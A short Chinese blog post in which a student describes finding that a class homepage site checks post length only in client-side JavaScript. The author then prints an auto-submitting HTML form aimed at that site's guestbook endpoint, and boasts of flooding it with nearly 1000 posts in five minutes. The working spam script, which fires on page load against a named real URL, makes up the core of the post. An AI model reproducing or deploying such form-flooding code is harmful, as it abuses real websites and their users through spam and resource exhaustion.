发现星辰个漏洞

 好久没有写日志了呵呵，最近一直在忙学习，恩恩，人家还是好学生嘛，每天至少要把作业做完吧，嘿嘿。

       看到班长发的指标了，每人每天向班级主页灌水5帖。真是汗颜哇....... 

       恩，抽了个时间看了下，突然发现了个星辰的小错误.....

       他们把样式表,js放在开头.....你用yslow测一下你的效率，以后还是做个单独的js和css文件然后require进去，他们几乎把该页面的信息全部都告诉了你，因为你看它的源代码几乎什么都可以看到了.

       还有，就算你写js再来个最多发表150个字，gbook.php里面验证了用户输入了没有？？都则删了你的js再提交可以提交多少字都是可以的...

       没花多少时间，写了个自动提交表单的网页，直接点后退就可以灌水了，测试了下，5分钟大概灌了将近1000的帖，还算可以啦，虽然麻烦了点.代码具体如下:

   /************网页灌水***************/

<script>
function put(){
document.commentForm.submit();//貌似只能提交英文，不能提交中文.
}
</script>
<body onload='put();'>
<form name="commentForm" id="commentForm" method="post" action="http://stuhome.net/classcreate/classspace/gbook_post.php"   >
<textarea name="gbook_content" id="gbook_content">
..........
</textarea>
<input name="touserid" id="touserid" type="hidden" value="no">
<input name="Submit" type="submit" class="button1" value="发 表"/>  
</form>              

以后还是不要用cookie了呵呵